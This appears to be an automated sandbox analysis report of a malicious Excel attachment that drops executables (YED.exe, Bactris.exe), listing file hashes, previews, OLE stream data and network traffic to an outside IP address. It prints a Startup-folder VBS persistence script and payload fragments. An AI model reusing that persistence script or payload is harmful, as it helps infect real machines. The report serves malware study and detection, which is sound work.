Malicious:	false
Preview:	EA06.....C..zm..0.P..].oT..i.zp.....(...R..!.....U...ZW.sN..?.?..3....)5..<.J.S9u.m$.Vgs....n..+.)T.......i..`.P'W`.....H..w..F.99\7E.m.v.LT.@.Il..P..h......./+.....}v....6.\|.... k.9.D..B.....+......,..a..J....".. k\|....i..R ....U%..8 ...n!O......&..xk]A..k4EV..U)t:h....Qj.Z@.......J...V..JuV..AU.tp..]h.zu....z..K.......V.@...^...wI.....N.U..`>m."o.......V..A.g...X.@....P..t.u].p.C.M.r...>.R.(11..h......7.Yd..AM.y'@.. .@..x.z@......n..<.C$..!.....J.T.....b....P.K,.GD..k`...aT......,.C.._$...W7.^......G. f....R.'.Qe......@r......E..P\|....U;..0....B.@_...@.........?.....p.jf3...]].Gf....7.........P.:<..N.......-..^.t..ON..e..5.{u...,...^.u(.........r.@E......&.....R...tZ.~.4.S..k.:a......y.....h4..R..,tj./..@$.D..@..H8{...'.z.p...ar.R.{d..M.y..Z.s7..AbT....L.N....a..R.o.....G.0.......`<.0.. ..`.i...I..f..........2.U.....^.+...b.9......P........`..........M......6P......P........h....F.(..>.0.`@(.M....f......*.V;...Z.n..k....................@..(9k

C:\Users\user\AppData\Local\Temp\aut88B1.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\YED.exe
File Type:	data
Category:	dropped
Size (bytes):	9940
Entropy (8bit):	7.604277577483741
Encrypted:	false
SSDEEP:	192:m+cKjLMiz/tlNOVZOZIbgiQ+VjN7yObFOhgxe4rTKwvuEQxB2XQeyfSxKiw:97jwiz/tlUVZOggizjNMaJiwvcaWfIKj
MD5:	33EF5FF3683E9521D0D673AE23B45E97
SHA1:	DA97189F0AF2DAA97C777863CDA46B19EFE53A63
SHA-256:	7FE77D32141C1F66DE426ACAF52B096FA8991CB6DBEFF2A0F461F446A8632733
SHA-512:	73C49017A7D7D7B3CEEC6E03E0DC07AA4F0D2D5A2A4C9D22290B383AE8D62D21F82A0D2B7271C013078F939D29ABFF3BFFC5FC8A2D6C46FDA72F91287A881C83
Malicious:	false
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\aut9924.tmp

Download File

Process:	C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe
File Type:	data
Category:	dropped
Size (bytes):	407084
Entropy (8bit):	7.892991458916071
Encrypted:	false
SSDEEP:	12288:5Y7/epA+GWjJxDpsHIkSBBWR6tna1bEX+9j9BR2EMh2:5qRhPR6OEX8j9/2EA2
MD5:	5816FD286AFCB30B981CA55E867A40BF
SHA1:	BA87750C26842B802EDEFEB86802D42DBF6C21E6
SHA-256:	1DA09B783C94CA10A320CC6B9ADBD0E879982105ACEB6AFAD1F03245C7B7B809
SHA-512:	8CEF41F0FEFB22C3DA77C998074ED28044848B8A70C311B50A222EFFA493FF71F8B860263554372F9EADD48727F97FD0EFF8152348E11EB1304837C9B534820B
Malicious:	false
Preview:	EA06.....C..zm..0.P..].oT..i.zp.....(...R..!.....U...ZW.sN..?.?..3....)5..<.J.S9u.m$.Vgs....n..+.)T.......i..`.P'W`.....H..w..F.99\7E.m.v.LT.@.Il..P..h......./+.....}v....6.\|.... k.9.D..B.....+......,..a..J....".. k\|....i..R ....U%..8 ...n!O......&..xk]A..k4EV..U)t:h....Qj.Z@.......J...V..JuV..AU.tp..]h.zu....z..K.......V.@...^...wI.....N.U..`>m."o.......V..A.g...X.@....P..t.u].p.C.M.r...>.R.(11..h......7.Yd..AM.y'@.. .@..x.z@......n..<.C$..!.....J.T.....b....P.K,.GD..k`...aT......,.C.._$...W7.^......G. f....R.'.Qe......@r......E..P\|....U;..0....B.@_...@.........?.....p.jf3...]].Gf....7.........P.:<..N.......-..^.t..ON..e..5.{u...,...^.u(.........r.@E......&.....R...tZ.~.4.S..k.:a......y.....h4..R..,tj./..@$.D..@..H8{...'.z.p...ar.R.{d..M.y..Z.s7..AbT....L.N....a..R.o.....G.0.......`<.0.. ..`.i...I..f..........2.U.....^.+...b.9......P........`..........M......6P......P........h....F.(..>.0.`@(.M....f......*.V;...Z.n..k....................@..(9k

C:\Users\user\AppData\Local\Temp\aut9982.tmp

Download File

Process:	C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe
File Type:	data
Category:	dropped
Size (bytes):	9940
Entropy (8bit):	7.604277577483741
Encrypted:	false
SSDEEP:	192:m+cKjLMiz/tlNOVZOZIbgiQ+VjN7yObFOhgxe4rTKwvuEQxB2XQeyfSxKiw:97jwiz/tlUVZOggizjNMaJiwvcaWfIKj
MD5:	33EF5FF3683E9521D0D673AE23B45E97
SHA1:	DA97189F0AF2DAA97C777863CDA46B19EFE53A63
SHA-256:	7FE77D32141C1F66DE426ACAF52B096FA8991CB6DBEFF2A0F461F446A8632733
SHA-512:	73C49017A7D7D7B3CEEC6E03E0DC07AA4F0D2D5A2A4C9D22290B383AE8D62D21F82A0D2B7271C013078F939D29ABFF3BFFC5FC8A2D6C46FDA72F91287A881C83
Malicious:	false
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\bhvA8BE.tmp

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x33b00c01, page size 32768, DirtyShutdown, Windows version 6.1
Category:	dropped
Size (bytes):	21037056
Entropy (8bit):	1.1388600072440405
Encrypted:	false
SSDEEP:	24576:oO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:oOEXs1LuHqqEXwPW+RHA6m1fN
MD5:	FC3F1E2F896AAD002E649927D559BF10
SHA1:	98D160C1EBA725D674E43561EF1A41783EA42A2A
SHA-256:	ABFD02FDA1A9AE62F7B67D2F7B5234A3D2B415B4969D2F103A54E7A1DE55F86A
SHA-512:	AD0AE4C3F86940045213846C03405F843E5E05847ABB28A12B07C82F42712FA9469953A3A9E12FE476A7F8002D6A678B2BEF6F2F9FD36B99FEA66FD027D050D3
Malicious:	false
Preview:	3...... ........................u..............................;:...{...:...\|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\chp8DDF.tmp

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 11, database pages 51, cookie 0x5a, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.2251184767067138
Encrypted:	false
SSDEEP:	192:jpqGfZM7TJkb3dS9gnTPxbH9q+6cEuEHVuHgslQxC:jpqzuSWnTJD9q+MHVuHpKx
MD5:	C70CFAD67540844C840E01DFE5EAB956
SHA1:	000A9A4E44F55D996A112BDCD4B33FFFF6686A9C
SHA-256:	91B4A09F472412B071A4BB0F3EDA19B3802BA04E0654B889454A0F71E0927117
SHA-512:	7030E6481FB71CABA765D879BBB00908E8414F2C78D82E0D4539B49415C2EACFB764CA350F5B8E126828E2042E2B00219D5E43FC8CEAD70655439ED45E4F936E
Malicious:	false
Preview:	SQLite format 3......@ .......3...........Z......................................................_............3........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\chp8E2E.tmp

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039004, page size 2048, file counter 4, database pages 23, cookie 0x23, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7761817078691606
Encrypted:	false
SSDEEP:	96:k+PLKlG9Me7mlcwCqPmQKLq8tObn8MouO:fPLKlGgcMKa7
MD5:	1C3541AE5A2091BBB788E7316B8B4E93
SHA1:	27087295F197DCAD7062EB1CCA09334C1933236A
SHA-256:	F99A92EF26674F0E9BD9E89DEF7C31AB032B091433292D5F0F8D2F89BCD8CE0F
SHA-512:	09AABF3823A43E7683DAFFE596C041C6CE19E63C9E9F2BB7A72B84C54269941A6EC7C6EAB80F7F5E494AC10C09398C0846AD385D60BC6738E84F85D14EF25AD8
Malicious:	false
Preview:	SQLite format 3......@ ...................#......................................................_.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\eupolyzoan

Download File

Process:	C:\Users\user\AppData\Roaming\YED.exe
File Type:	data
Category:	dropped
Size (bytes):	494592
Entropy (8bit):	7.6245065734246245
Encrypted:	false
SSDEEP:	12288:rm/zGgKDO6f9JWgMtuwCj4oBdRQUzWoJg8mt5w+:eCg+fGFuwCjVRPnmt5w+
MD5:	C877ED9D175FBAC9D438C1EBD391C5A9
SHA1:	8DFF40C8996163310C8D6E52AB1C4A4B90AE6309
SHA-256:	6690C74313D3EF0180CEC199977221A52A15AD346B7DA5F1E73417B74BA7B961
SHA-512:	01F9581EDD31DC5C197BA6C0086F71945677EDCDBC5F83B4A05632694F6F3AC58F48AF2A29129029D94C01970DCAC2C232ACEAF830815650C4B747558CE0122B
Malicious:	false
Preview:	...7MAM0VCFU..7T.UO7NAM0.CFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUUY7TEJ.9N.D.s.G..yc<"&oG<.B3.f6$6Y;?u-Rn38^r(u..dt&:+R`L@:vCFUEX7TG......N...+....3kI...N.%`+....3hI...N...+.....]I...N.......H<..N../.....I...N...+0....Hb..N..l+.....H...N.%=...KUO7NAM0RCFUEX7T..O7.@J0.r.0EX7TKUO7.AO1YBHUE2TKCM7NAM0..EUEH7TK.J7NA.0RSFUEZ7TNUN7NAM0WCGUEX7TKuG7NEM0RCFUGX7.KU_7NQM0RCVUEH7TKUO7^AM0RCFUEX7T.I7J@M0R.AU..7TKUO7NAM0RCFUEX7TK.H7.zM0..@U}X7TKUO7NAM0RCFUEX7T..I7VAM0.@U.X7TKUO7NAM0R.CU.\7TKUO7NAM0RCFUEX7TKUO7NAM0\|7#-1X7T>$J7NQM0R1CUE\7TKUO7NAM0RCFUeX74e'+V: M0.:GUE.2TK/N7N7H0RCFUEX7TKUO7.AMp\|''!$X7T..O7NQJ0RMFUE.1TKUO7NAM0RCFU.X7.e!#DNAM0[CFUE(0TKWO7N.K0RCFUEX7TKUO7.AM.\|$ <!+7T{WO7N.J0RGFUEX0TKUO7NAM0RCFU.X7.e'<E-AM0..FUE.0TK.O7NEJ0RCFUEX7TKUO7.AMp\|1#9;7T.nO7N.J0R.FUE.0TKUO7NAM0RCFU.X7.KUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0RCFUEX7TKUO7NAM0

C:\Users\user\AppData\Local\Temp\qcbxbnrr

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\~$imgs.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe

Download File

Process:	C:\Users\user\AppData\Roaming\YED.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	108357120
Entropy (8bit):	7.999496835019783
Encrypted:	true
SSDEEP:	98304:VjTQYxsWR96TM6WPPRhlUtfFJs23ArLES1eS+0r3f6RXe7oRpJJbCsJ3bMfebIGU:V3dxf36ZWhotta+0rfnoRnaTJ4GV
MD5:	A8004A594D5D55F5A5F5ABDBB8001FA9
SHA1:	CBC9AA5D01128A10A82F22145C21E1837EBB7EC3
SHA-256:	8905FA86EF9A74F2A983710249BDD67ED97A8FF0F73828C1B9AFEC8D153F5BAB
SHA-512:	AD6537E5DA31EEA38A1C8CAF515C1EA861DBB9B1883298FFCB823D42E17AF291ABD8EB376D0823AEE2285C8C5C36F234FA7BFE61557787E425091AE9B6E75C2F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....2f..........".................w.............@.......................................@...@.......@.....................d...\|....@.......................@...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u...@...v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bactris.vbs

Download File

Process:	C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe
File Type:	data
Category:	dropped
Size (bytes):	276
Entropy (8bit):	3.4373911393705248
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfcltr1UEZ+lX1AlRchj5nriIM8lfQVn:DsO+vNlZ1Q1AlR05mA2n
MD5:	F8DCB60EE8BC14C96632E7FA13344239
SHA1:	7C687E02238728059F944246C78BFC6D4EC8347B
SHA-256:	BB26FF2B8FE0C4B3429FC243A24AC2AE84468EBA57B6EA39DA01E6A869063D93
SHA-512:	F6E6D3A736B9EE41725B385F1213F8BC6134F8AEA932E9E0FBC02BF4D4E68A0FD4DD8A49000E04580E3F2AEDFDCD740D2D7D9FC350EDD82A47E28C7F799FAE5A
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.e.u.p.o.l.y.z.o.a.n.\.B.a.c.t.r.i.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

C:\Users\user\AppData\Roaming\YED.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1402368
Entropy (8bit):	7.165354738478778
Encrypted:	false
SSDEEP:	24576:pqDEvCTbMWu7rQYlBQcBiT6rprG8awSAxyHE9EjgjebQV:pTvC/MTQYxsWR7awZx4/Ml
MD5:	9ABB13386C543EB5FEA7DEA95EB86D26
SHA1:	397BD9E254C1A4E791BC449AFB720AD6AF8378B0
SHA-256:	43AAADAA21A6510FA285363CF04C9E240954C750872CA1E105261E165B9E49DB
SHA-512:	62CE7FDD09881486C34888145AA94306DF16D169132ED7B9AC4AEBD805D9C37E775AFC8F99FA3813FAA42B40923C2796A5A81881E8CF7A2E2FB6DB047DCF0B8B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....2f..........".................w.............@.......................................@...@.......@.....................d...\|....@.......................@...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u...@...v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\logs.dat

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	6.635067015271115
Encrypted:	false
SSDEEP:	3:u5eM755JlrAcMERa0MQps3ZBzP2YJz95Z7OfqN4iPJRhZNNAn:u5J53UcMTaWJFP2U5Z7wqxJRhW
MD5:	96E3B96670F45FBE2F3B22802DAB32B9
SHA1:	F041C04B581FB2469D49A47DEE04BB4D79B8F9F7
SHA-256:	43C19920723E4DEDA0DF54B2C73D099FDE9A4CD66C7865E876A006BB0BD6592E
SHA-512:	C8CC434B082A0CE899A7A3397E59C2F76FE4F5F77CC4A93C7DDE5A7A2C6192AAE8F9D5771F7938F92697D3A830D3C44A41D56DD1FC37B3E84A310B12AF98F049
Malicious:	false
Preview:	.D{6............x.X"..`...Y.O.yv..7E....,.....X5.q..i5&....mO..b....R....hV...5.r.M.z.C..@j.g.#....FPc..-r..[!........]........._.c......{.

C:\Users\user\Desktop\~$202404294766578200.xlam.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Desktop\~$202404294766578200.xlam.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4122)
Category:	downloaded
Size (bytes):	4127
Entropy (8bit):	6.004614369885366
Encrypted:	false
SSDEEP:	96:xf/gi3m0xXExDYNbeS3Yi8NsI67zNxyWkrrjkXsffQffL:xQ+mdoeeKN67zsrol
MD5:	8BA399134034A8EF0ED5546316BB8D99
SHA1:	A97A3022411DDCF96D654F5BB54D24A14A1FD0B1
SHA-256:	180231C9EAAD9CDD3B41BF62DF1414027FBFE2E765FCCD5A4F8F47DE529B978B
SHA-512:	13B413FB6DA6B2590EA55D3442C7C79BB51D097D77900D5188C418DC5C5C9B5A214D78700D90916D663751CDC62B56F15E029C8D1BCBDDEBB43969141EAE1F92
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["nyt crossword clues","fishing guide stellar blade","federal reserve interest rates","drake maye","fortnite restored reels dance floor","soviet era combat aircraft","google layoffs mexico","deebo samuel"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"pre":0,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"a":"Football quarterback","dc":"#424242","i":"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdHx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3N//AABEIAEAAQAMBIgACEQEDEQH/xAAbAAACAgMBAAAAAAAAAAAAAAAABQYHAwQIAv/EADMQAAIBAwIEBQIFAwUAAAAAAAECAwAEEQUhBhIxQQcTYXGBUZEyQqGxwTRy4RQiIyYz/8QAGQEAAgMBAAAAAAAAAAAAAAAAAwQAAQUC/8QAIREAAgIDAAEFAQAAAAAAAAAAAQIAAwQRITESEyJRYQX/2gAMAwEAAhEDEQA/ALxoooqSTQ1vV7HQtNm1HVJ1gtoRlmO5J7ADuT9Kozijxj1rULn/AK/nTLNfwl4

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.99777773343233
TrID:	Excel Microsoft Office Open XML Format document (40004/1) 83.33% ZIP compressed archive (8000/1) 16.67%
File name:	202404294766578200.xlam.xlsx
File size:	620'921 bytes
MD5:	9336f772a40e762cc855b7c9b75b1d28
SHA1:	837d90dbe2f9c267e26ad4e170b7bd03d199f335
SHA256:	ca377ebfd8e0d57754a3780b6b7360a76efad94c8d5753e172a52802bf109ddc
SHA512:	c9d7e7b081ec7360a0f473e2eac01c821b0fbf824d0973eacd6cd0e687f04723df63297a28d4b20ae65948c89560c0b6ce644deee90ef3ac78b15bbeb20b0f1c
SSDEEP:	12288:T6nWUgUjdBVpgh0TL1ftjVi7oToJcMAr7pVFMqe2nH61vSp3qE/8LOKqYsN5/:+QWVWYVoZAnP42n4KZX/8LtqYEx
TLSH:	FCD433E5226637861B0814E4FCE77D4962776D2C62821CCF3A3A091878F1CCFDA2B756
File Content Preview:	PK........X].X.M.8............[Content_Types].xmlUT....2f.2f.2f.U.n.0....?.........J.Y.E..H...9.hq..x.....(...!_.....q....F.l.>HkJrQ.H..[!MS......d!2#...J..@no....l....&......4..4..u`0R[.Y.W.P.x.........D01.......fof...<TRIC..!/I..9.$g..te.'..... ,...

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "202404294766578200.xlam.xlsx"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Author:	SHINY
Last Saved By:	X10LUXURY
Create Time:	2010-06-04T08:55:28Z
Last Saved Time:	2023-07-30T22:56:25Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary

Thumbnail Scaling Desired:	false
Company:	Grizli777
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	15.0300

Streams

Stream Path: \x1oLe10NAtIVe, File Type: data, Stream Size: 882522

General
Stream Path:	\x1oLe10NAtIVe
CLSID:
File Type:	data
Stream Size:	882522
Entropy:	5.8441392306296285
Base64 Encoded:	True
Data ASCII:	. . Y S . . . B . > / g + . . . U . r - . r ( @ R A . 5 - 1 ; Z & . . 0 l } f 4 } . > f 7 \\ ! . . \\ 7 ; 6 @ s . J . H R + d : r $ L B L . . j . . M _ . o U . s . @ . : x E 4 X . P 5 : \\ I . . . . . 0 ' d @ . P . . R J . . . ^ . . ) G . . G Y C / g + q / . + 6 ; . b Y > R Q . U g _ > . . . . \\ 7 3 . r C ? W . + . G . . A J k q 6 n { . = . ~ % ( . r / J i + 5 k 9 s . $ ? . Z Q Z . B $ { M . i M . D C 6 2 . q { . W A z ~ . . . N . L . ~ V ~ \| \\ . I ` W c . d 3 . . V . . r < $ i Q ! . Q . 2 F . e l . H . / . u
Data Raw:	f0 ba b3 01 02 59 a4 a7 88 53 01 08 ce a3 be c3 42 ba ff f7 d6 8b 3e 8b 2f be fa e7 67 2b 81 e6 b4 7f d6 90 8b 16 55 ff d2 05 c5 72 8a cc 2d 1f 72 8a cc ff e0 b4 28 40 c2 ee 52 c7 41 00 35 fb 2d 31 dd 3b ab 5a 26 14 1a 30 ab 6c 7d 66 34 c6 7d 12 3e df 66 37 5c 21 af 89 0b c3 84 5c f4 37 3b a0 fe cd c9 c8 36 40 73 11 4a e0 f6 ed 1d 48 52 2b 64 3a ea 72 24 f3 b9 ca e1 4c 42 dc c5 4c

Stream Path: FOc7Z7di34r, File Type: empty, Stream Size: 0

General
Stream Path:	FOc7Z7di34r
CLSID:
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 2, 2024 04:54:52.862775087 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:52.972450018 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:52.972551107 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:52.973706007 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.083898067 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.083945990 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.084021091 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.084120989 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.084146023 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.084202051 CEST	49161	80	192.168.2.22	23.94.54.101
May 2, 2024 04:54:53.193768978 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.193792105 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.193803072 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.193815947 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.193828106 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.193891048 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.193905115 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.193916082 CEST	80	49161	23.94.54.101	192.168.2.22
May 2, 2024 04:54:53.193942070 CEST	49161	80	192.168.2.22	23.94.54.101
